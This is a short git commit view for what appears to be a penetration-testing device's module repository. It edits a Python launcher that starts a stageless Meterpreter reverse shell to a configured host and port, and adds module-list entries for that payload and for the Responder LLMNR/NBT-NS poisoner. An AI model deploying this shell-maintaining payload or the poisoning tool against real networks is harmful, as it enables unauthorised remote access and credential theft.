Merge pull request #12 from IMcPwn/gh-pages

Update module_list with meterpreter-sl and responder
pull/13/head
Sebastian Kinne 2016-05-13 19:13:20 +02:00
commit bb89d00041
2 changed files with 3 additions and 1 deletions

View File

@ -165,7 +165,7 @@ PORT = subprocess.Popen("uci get meterpreter-sl.port", shell=True, stdout=subpro
PORT = PORT.replace("\n", "")
SLEEP = subprocess.Popen("uci get meterpreter-sl.sleep", shell=True, stdout=subprocess.PIPE).stdout.read()
SLEEP = SLEEP.replace("\n", "")
STAGELESS_METERPRETER = "/usr/bin/stageless_meterpreter " + HOST + " " + PORT
STAGELESS_METERPRETER = "/usr/bin/stageless-meterpreter " + HOST + " " + PORT
if HOST == "" or PORT == "":
subprocess.call('/usr/bin/logger "Meterpreter: Error, configuration blank"', shell=True)
print "Meterpreter: Error, configuration blank"

View File

@ -19,3 +19,5 @@ clomac Clone Clients MAC address into WAN interface
upnp-portfwd uPnP Port Forwarding
ddnsc Dynamic Domain Name Service
tortle TOR Turtle Gateway TOR hidden SHELL Service
meterpreter-sl Stageless Metasploit payload to maintain shells
responder Responder - LLMNR, NBT-NS and MDNS poisoner